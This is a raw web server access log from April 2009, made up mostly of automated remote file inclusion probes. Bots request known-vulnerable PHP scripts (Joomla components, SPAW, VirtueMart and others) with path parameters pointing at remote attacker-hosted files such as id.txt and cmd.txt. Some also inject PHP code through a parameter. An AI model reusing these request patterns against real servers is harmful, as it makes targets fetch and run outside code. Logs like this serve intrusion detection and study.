218.27.203.107 - - [27/Apr/2009:11:53:57 -0500] "GET /logs/access_log.1238889600//s_loadenv.inc.php?DOCUMENT_ROOT=http://kcaer.re.kr/zboard/icon/klebuix/id.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
209.62.42.242 - - [27/Apr/2009:11:54:44 -0500] "GET /logs/access_log.1238112000signin.php?_AMGconfig[cfg_serverpath]=http://www.freeimagehosting.net/uploads/faa2cb3307.jpg?? HTTP/1.1" 404 319 "-""libwww-perl/5.810"
209.62.42.242 - - [27/Apr/2009:11:54:44 -0500] "GET /logs/access_log.1238112000signin.php?_AMGconfig[cfg_serverpath]=http://www.freeimagehosting.net/uploads/04dff96c74.jpg?? HTTP/1.1" 404 319 "-""libwww-perl/5.810"
209.62.42.242 - - [27/Apr/2009:11:55:12 -0500] "GET /signin.php?_AMGconfig[cfg_serverpath]=http://www.freeimagehosting.net/uploads/faa2cb3307.jpg?? HTTP/1.1" 404 293 "-""libwww-perl/5.810"
209.62.42.242 - - [27/Apr/2009:11:55:12 -0500] "GET /logs/signin.php?_AMGconfig[cfg_serverpath]=http://www.freeimagehosting.net/uploads/faa2cb3307.jpg?? HTTP/1.1" 404 298 "-""libwww-perl/5.810"
209.62.42.242 - - [27/Apr/2009:11:55:12 -0500] "GET /signin.php?_AMGconfig[cfg_serverpath]=http://www.freeimagehosting.net/uploads/04dff96c74.jpg?? HTTP/1.1" 404 293 "-""libwww-perl/5.810"
209.62.42.242 - - [27/Apr/2009:11:55:12 -0500] "GET /logs/signin.php?_AMGconfig[cfg_serverpath]=http://www.freeimagehosting.net/uploads/04dff96c74.jpg?? HTTP/1.1" 404 298 "-""libwww-perl/5.810"
62.173.161.148 - - [27/Apr/2009:11:56:42 -0500] "GET /logs/access_log.1237680000//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.typo3sverige.se/typo3temp/cmd.txt? HTTP/1.1" 404 357 "-""libwww-perl/5.79"
62.173.161.148 - - [27/Apr/2009:11:56:42 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.typo3sverige.se/typo3temp/cmd.txt? HTTP/1.1" 404 330 "-""libwww-perl/5.79"
62.173.161.148 - - [27/Apr/2009:11:56:42 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.typo3sverige.se/typo3temp/cmd.txt? HTTP/1.1" 404 335 "-""libwww-perl/5.79"
62.173.161.148 - - [27/Apr/2009:12:00:11 -0500] "GET /logs/access_log.1237680000/errors.php?error=http://www.typo3sverige.se/typo3temp/cmd.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.79"
62.173.161.148 - - [27/Apr/2009:12:00:12 -0500] "GET /errors.php?error=http://www.typo3sverige.se/typo3temp/cmd.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
62.173.161.148 - - [27/Apr/2009:12:00:12 -0500] "GET /logs/errors.php?error=http://www.typo3sverige.se/typo3temp/cmd.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
217.172.186.250 - - [27/Apr/2009:12:00:31 -0500] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
217.172.186.250 - - [27/Apr/2009:12:00:31 -0500] "GET /logs/access_log.1237939200//admin/spaw/spaw_control.class.php?spaw_root=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
217.172.186.250 - - [27/Apr/2009:12:00:31 -0500] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
92.52.110.170 - - [27/Apr/2009:12:00:44 -0500] "GET /logs////index.php?option=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 300 "-""Mozilla/5.0"
92.52.110.170 - - [27/Apr/2009:12:00:44 -0500] "GET ////index.php?option=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 295 "-""Mozilla/5.0"
92.52.110.170 - - [27/Apr/2009:12:00:44 -0500] "GET /logs/access_log.1239408000////index.php?option=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
92.52.110.170 - - [27/Apr/2009:12:00:46 -0500] "GET /logs////index.php?option=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 300 "-""Mozilla/5.0"
92.52.110.170 - - [27/Apr/2009:12:00:46 -0500] "GET ////index.php?option=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 295 "-""Mozilla/5.0"
92.52.110.170 - - [27/Apr/2009:12:00:46 -0500] "GET /logs/access_log.1239408000////index.php?option=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
121.165.73.157 - - [27/Apr/2009:12:01:05 -0500] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://isepic.tugaspeed.info/id.txt???? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
121.165.73.157 - - [27/Apr/2009:12:01:05 -0500] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://isepic.tugaspeed.info/id.txt???? HTTP/1.1" 404 317 "-""libwww-perl/5.805"
217.172.186.250 - - [27/Apr/2009:12:01:53 -0500] "GET /logs/access_log.1239321600//admin/spaw/spaw_control.class.php?spaw_root=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
89.111.184.103 - - [27/Apr/2009:12:02:12 -0500] "GET /logs/access_log.1228608000//bbs/skin/zero_vote/ask_password.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 346 "-""libwww-perl/5.805"
89.111.184.103 - - [27/Apr/2009:12:02:12 -0500] "GET //bbs/skin/zero_vote/ask_password.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 319 "-""libwww-perl/5.805"
89.111.184.103 - - [27/Apr/2009:12:02:13 -0500] "GET /logs//bbs/skin/zero_vote/ask_password.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 324 "-""libwww-perl/5.805"
65.17.204.25 - - [27/Apr/2009:12:05:03 -0500] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.filregalo.com/docs/zencart.do??? HTTP/1.1" 404 330 "-""libwww-perl/5.79"
65.17.204.25 - - [27/Apr/2009:12:05:04 -0500] "GET /logs/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.filregalo.com/docs/zencart.do??? HTTP/1.1" 404 335 "-""libwww-perl/5.79"
168.209.97.34 - - [27/Apr/2009:12:05:56 -0500] "GET /logs/access_log.1239667200//listener_graph.php//common/db.php?commonpath=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 344 "-""Mozilla/5.0"
168.209.97.34 - - [27/Apr/2009:12:05:56 -0500] "GET //listener_graph.php//common/db.php?commonpath=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 317 "-""Mozilla/5.0"
168.209.97.34 - - [27/Apr/2009:12:05:56 -0500] "GET /logs//listener_graph.php//common/db.php?commonpath=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
168.209.97.34 - - [27/Apr/2009:12:06:04 -0500] "GET /logs/access_log.1239235200//listener_graph.php//common/db.php?commonpath=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 344 "-""Mozilla/5.0"
220.134.10.54 - - [27/Apr/2009:12:06:41 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://77.74.195.211/modernbill//include/misc/susuwmuw/cmd.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
220.134.10.54 - - [27/Apr/2009:12:06:43 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://77.74.195.211/modernbill//include/misc/susuwmuw/cmd.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
194.67.32.45 - - [27/Apr/2009:12:08:11 -0500] "GET /logs/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.filregalo.com/docs/zencart.do?%0D?? HTTP/1.1" 404 335 "-""libwww-perl/5.65"
194.67.32.45 - - [27/Apr/2009:12:08:11 -0500] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.filregalo.com/docs/zencart.do?%0D?? HTTP/1.1" 404 330 "-""libwww-perl/5.65"
203.97.95.186 - - [27/Apr/2009:12:14:05 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
203.97.95.186 - - [27/Apr/2009:12:14:05 -0500] "GET /logs/access_log.1239235200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
203.97.95.186 - - [27/Apr/2009:12:14:05 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
203.97.95.186 - - [27/Apr/2009:12:14:23 -0500] "GET /logs/access_log.1239321600//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
203.97.95.186 - - [27/Apr/2009:12:14:45 -0500] "GET /logs/access_log.1239235200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
203.97.95.186 - - [27/Apr/2009:12:14:45 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
203.97.95.186 - - [27/Apr/2009:12:14:45 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
89.111.184.103 - - [27/Apr/2009:12:14:58 -0500] "GET /logs//bbs/skin/zero_vote/ask_password.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 324 "-""libwww-perl/5.805"
89.111.184.103 - - [27/Apr/2009:12:14:59 -0500] "GET //bbs/skin/zero_vote/ask_password.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 319 "-""libwww-perl/5.805"
203.97.95.186 - - [27/Apr/2009:12:15:03 -0500] "GET /logs/access_log.1239321600//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
72.30.142.126 - - [27/Apr/2009:12:16:32 -0500] "GET /robots.txt HTTP/1.0" 404 281 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.142.126 - - [27/Apr/2009:12:16:32 -0500] "GET /logs/access_log.1132617600 HTTP/1.0" 200 3269 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
89.186.1.54 - - [27/Apr/2009:12:17:14 -0500] "GET /logs//oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://pallmall5.fileave.com/id.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
89.186.1.54 - - [27/Apr/2009:12:17:17 -0500] "GET //oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://pallmall5.fileave.com/id.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
89.186.1.54 - - [27/Apr/2009:12:17:17 -0500] "GET /logs/access_log.1235606400//oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://pallmall5.fileave.com/id.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
89.186.1.54 - - [27/Apr/2009:12:17:17 -0500] "GET /logs/access_log.1236729600//oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://pallmall5.fileave.com/id.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
219.85.63.226 - - [27/Apr/2009:12:18:00 -0500] "GET /logs/bbshop/shop/main.php?_shop_path=http://jeffbickford.com/widgets/z1?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
219.85.63.226 - - [27/Apr/2009:12:18:00 -0500] "GET /bbshop/shop/main.php?_shop_path=http://jeffbickford.com/widgets/z1?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
219.85.63.226 - - [27/Apr/2009:12:18:00 -0500] "GET /logs/access_log.1237248000/bbshop/shop/main.php?_shop_path=http://jeffbickford.com/widgets/z1?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
219.85.63.226 - - [27/Apr/2009:12:18:04 -0500] "GET /logs/access_log.1235606400/bbshop/shop/main.php?_shop_path=http://jeffbickford.com/widgets/z1?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
89.186.1.54 - - [27/Apr/2009:12:18:43 -0500] "GET //oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://pallmall5.fileave.com/id.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
89.186.1.54 - - [27/Apr/2009:12:18:43 -0500] "GET /logs//oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://pallmall5.fileave.com/id.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
89.186.1.54 - - [27/Apr/2009:12:18:43 -0500] "GET /logs/access_log.1235606400//oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://pallmall5.fileave.com/id.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
89.186.1.54 - - [27/Apr/2009:12:18:43 -0500] "GET /logs/access_log.1236643200//oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://pallmall5.fileave.com/id.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
219.85.63.226 - - [27/Apr/2009:12:19:16 -0500] "GET /bbshop/shop/main.php?_shop_path=http://jeffbickford.com/widgets/z1?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
219.85.63.226 - - [27/Apr/2009:12:19:16 -0500] "GET /logs/access_log.1237248000/bbshop/shop/main.php?_shop_path=http://jeffbickford.com/widgets/z1?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
219.85.63.226 - - [27/Apr/2009:12:19:16 -0500] "GET /logs/bbshop/shop/main.php?_shop_path=http://jeffbickford.com/widgets/z1?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
219.85.63.226 - - [27/Apr/2009:12:19:16 -0500] "GET /logs/access_log.1235606400/bbshop/shop/main.php?_shop_path=http://jeffbickford.com/widgets/z1?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
64.191.102.117 - - [27/Apr/2009:12:23:37 -0500] "GET /logs//danielgil/index.php?page=http://www.thenakedtruckerandt-bones.com/echo.txt???? HTTP/1.1" 404 308 "-""libwww-perl/5.822"
64.191.102.117 - - [27/Apr/2009:12:23:37 -0500] "GET //danielgil/index.php?page=http://www.thenakedtruckerandt-bones.com/echo.txt???? HTTP/1.1" 404 303 "-""libwww-perl/5.822"
219.85.63.226 - - [27/Apr/2009:12:24:10 -0500] "GET /logs//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://jeffbickford.com/widgets/z1?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
219.85.63.226 - - [27/Apr/2009:12:24:10 -0500] "GET //snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://jeffbickford.com/widgets/z1?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
219.85.63.226 - - [27/Apr/2009:12:24:10 -0500] "GET /logs/access_log.1235347200//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://jeffbickford.com/widgets/z1?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
219.85.63.226 - - [27/Apr/2009:12:24:10 -0500] "GET /logs/access_log.1235779200//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://jeffbickford.com/widgets/z1?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
168.209.97.34 - - [27/Apr/2009:12:26:08 -0500] "GET //ask_password.php?dir=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 300 "-""Mozilla/5.0"
168.209.97.34 - - [27/Apr/2009:12:26:08 -0500] "GET /logs//ask_password.php?dir=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 305 "-""Mozilla/5.0"
168.209.97.34 - - [27/Apr/2009:12:26:08 -0500] "GET /logs/access_log.1234224000//ask_password.php?dir=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 327 "-""Mozilla/5.0"
69.94.109.230 - - [27/Apr/2009:12:26:33 -0500] "GET /logs//include/lib.inc.php?site_path=http://sito.blackdrag0n.net/Cartoon/idnew.txt? HTTP/1.1" 404 308 "-""libwww-perl/5.803"
69.94.109.230 - - [27/Apr/2009:12:26:34 -0500] "GET //include/lib.inc.php?site_path=http://sito.blackdrag0n.net/Cartoon/idnew.txt? HTTP/1.1" 404 303 "-""libwww-perl/5.803"
168.209.97.34 - - [27/Apr/2009:12:28:52 -0500] "GET /logs/access_log.1233964800//ask_password.php?dir=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 327 "-""Mozilla/5.0"
219.85.63.226 - - [27/Apr/2009:12:28:56 -0500] "GET //snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://jeffbickford.com/widgets/z1?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
219.85.63.226 - - [27/Apr/2009:12:29:07 -0500] "GET /logs//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://jeffbickford.com/widgets/z1?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
219.85.63.226 - - [27/Apr/2009:12:29:07 -0500] "GET /logs/access_log.1235347200//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://jeffbickford.com/widgets/z1?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
219.85.63.226 - - [27/Apr/2009:12:29:07 -0500] "GET /logs/access_log.1235779200//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://jeffbickford.com/widgets/z1?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
78.31.64.178 - - [27/Apr/2009:12:29:34 -0500] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.itaboy.com.br/suporte/Distro/id.txt?? HTTP/1.1" 404 304 "-""libwww-perl/5.805"
78.31.64.178 - - [27/Apr/2009:12:29:35 -0500] "GET /joomla/index.php?option=com_restaurante&task=http://www.itaboy.com.br/suporte/Distro/id.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
211.54.11.226 - - [27/Apr/2009:12:29:48 -0500] "GET /logs/access_log.1225238400//errors.php?error=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
211.54.11.226 - - [27/Apr/2009:12:29:48 -0500] "GET /logs//errors.php?error=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
211.54.11.226 - - [27/Apr/2009:12:29:48 -0500] "GET /logs/access_log.1229126400//errors.php?error=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
211.54.11.226 - - [27/Apr/2009:12:29:48 -0500] "GET //errors.php?error=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
147.47.106.24 - - [27/Apr/2009:12:30:09 -0500] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.sysweb.it/amik/copyright.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
147.47.106.24 - - [27/Apr/2009:12:30:09 -0500] "GET /logs/access_log.1237939200//admin/spaw/spaw_control.class.php?spaw_root=http://www.sysweb.it/amik/copyright.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
147.47.106.24 - - [27/Apr/2009:12:30:09 -0500] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.sysweb.it/amik/copyright.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
78.31.64.178 - - [27/Apr/2009:12:30:37 -0500] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.itaboy.com.br/suporte/Distro/id.txt?? HTTP/1.1" 404 317 "-""libwww-perl/5.805"
78.31.64.178 - - [27/Apr/2009:12:30:37 -0500] "GET /modules/My_eGallery/index.php?basepath=http://www.itaboy.com.br/suporte/Distro/id.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
65.55.208.143 - - [27/Apr/2009:12:31:32 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.143 - - [27/Apr/2009:12:31:32 -0500] "GET /logs/access_log.1141344000 HTTP/1.1" 200 2932 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
211.54.11.226 - - [27/Apr/2009:12:31:39 -0500] "GET //include/write.php?dir=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
211.54.11.226 - - [27/Apr/2009:12:31:39 -0500] "GET /logs/access_log.1231286400//include/write.php?dir=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
211.54.11.226 - - [27/Apr/2009:12:31:40 -0500] "GET /logs//include/write.php?dir=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
122.116.178.20 - - [27/Apr/2009:12:32:27 -0500] "GET ////index.php?option=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 295 "-""Mozilla/5.0"
122.116.178.20 - - [27/Apr/2009:12:32:29 -0500] "GET /logs////index.php?option=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 300 "-""Mozilla/5.0"
122.116.178.20 - - [27/Apr/2009:12:32:29 -0500] "GET /logs/access_log.1239408000////index.php?option=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
211.54.11.226 - - [27/Apr/2009:12:32:48 -0500] "GET /logs/access_log.1231804800//include/write.php?dir=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
163.24.136.10 - - [27/Apr/2009:12:33:11 -0500] "GET /logs/access_log.1238889600/modules/My_eGallery/index.php?basepath=http://www.koreavan.kr/technote6//data/id.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
163.24.136.10 - - [27/Apr/2009:12:33:11 -0500] "GET /logs/access_log.1238976000/modules/My_eGallery/index.php?basepath=http://www.koreavan.kr/technote6//data/id.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
163.24.136.10 - - [27/Apr/2009:12:33:11 -0500] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.koreavan.kr/technote6//data/id.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
163.24.136.10 - - [27/Apr/2009:12:33:11 -0500] "GET /modules/My_eGallery/index.php?basepath=http://www.koreavan.kr/technote6//data/id.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
70.247.250.222 - - [27/Apr/2009:12:34:33 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
70.247.250.222 - - [27/Apr/2009:12:34:33 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
70.247.250.222 - - [27/Apr/2009:12:34:33 -0500] "GET /logs/access_log.1239408000//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 361 "-""Mozilla/5.0"
147.47.106.24 - - [27/Apr/2009:12:34:46 -0500] "GET /logs/access_log.1239321600//admin/spaw/spaw_control.class.php?spaw_root=http://www.sysweb.it/amik/copyright.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
68.112.43.9 - - [27/Apr/2009:12:35:11 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.eforel.com/ecommerce/images/smilies/help.txt? HTTP/1.1" 404 339 "-""libwww-perl/5.803"
68.112.43.9 - - [27/Apr/2009:12:35:11 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.eforel.com/ecommerce/images/smilies/help.txt? HTTP/1.1" 404 339 "-""libwww-perl/5.803"
68.112.43.9 - - [27/Apr/2009:12:35:11 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.eforel.com/ecommerce/images/smilies/help.txt? HTTP/1.1" 404 334 "-""libwww-perl/5.803"
68.112.43.9 - - [27/Apr/2009:12:35:11 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.eforel.com/ecommerce/images/smilies/help.txt? HTTP/1.1" 404 334 "-""libwww-perl/5.803"
89.186.1.54 - - [27/Apr/2009:12:36:09 -0500] "GET //ask_password.php?dir=http://pallmall5.fileave.com/id.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
89.186.1.54 - - [27/Apr/2009:12:36:09 -0500] "GET /logs//ask_password.php?dir=http://pallmall5.fileave.com/id.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
89.186.1.54 - - [27/Apr/2009:12:36:09 -0500] "GET /logs/access_log.1234224000//ask_password.php?dir=http://pallmall5.fileave.com/id.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
210.68.188.206 - - [27/Apr/2009:12:36:28 -0500] "GET /logs/access_log.1231200000/modules/My_eGallery/index.php?basepath=http://xlab.cn.nctu.edu.tw//modules/xoopsgallery/id1.txt?%0D? HTTP/1.1" 404 339 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
210.68.188.206 - - [27/Apr/2009:12:36:28 -0500] "GET /modules/My_eGallery/index.php?basepath=http://xlab.cn.nctu.edu.tw//modules/xoopsgallery/id1.txt?%0D? HTTP/1.1" 404 312 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
210.68.188.206 - - [27/Apr/2009:12:36:28 -0500] "GET /logs/modules/My_eGallery/index.php?basepath=http://xlab.cn.nctu.edu.tw//modules/xoopsgallery/id1.txt?%0D? HTTP/1.1" 404 317 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
210.68.188.206 - - [27/Apr/2009:12:36:28 -0500] "GET /logs/access_log.1230681600/modules/My_eGallery/index.php?basepath=http://xlab.cn.nctu.edu.tw//modules/xoopsgallery/id1.txt?%0D? HTTP/1.1" 404 339 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
122.116.178.20 - - [27/Apr/2009:12:38:01 -0500] "GET /logs////index.php?option=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 300 "-""Mozilla/5.0"
122.116.178.20 - - [27/Apr/2009:12:38:01 -0500] "GET ////index.php?option=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 295 "-""Mozilla/5.0"
122.116.178.20 - - [27/Apr/2009:12:38:01 -0500] "GET /logs/access_log.1239408000////index.php?option=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
122.116.178.20 - - [27/Apr/2009:12:38:17 -0500] "GET /logs/access_log.1239408000////index.php?option=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
122.116.178.20 - - [27/Apr/2009:12:38:17 -0500] "GET /logs////index.php?option=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 300 "-""Mozilla/5.0"
122.116.178.20 - - [27/Apr/2009:12:38:18 -0500] "GET ////index.php?option=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 295 "-""Mozilla/5.0"
89.186.1.54 - - [27/Apr/2009:12:38:26 -0500] "GET /logs/access_log.1231718400//ask_password.php?dir=http://pallmall5.fileave.com/id.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
69.94.109.230 - - [27/Apr/2009:12:38:50 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://sito.blackdrag0n.net/Cartoon/idnew.txt? HTTP/1.1" 404 339 "-""libwww-perl/5.803"
69.94.109.230 - - [27/Apr/2009:12:38:50 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://sito.blackdrag0n.net/Cartoon/idnew.txt? HTTP/1.1" 404 334 "-""libwww-perl/5.803"
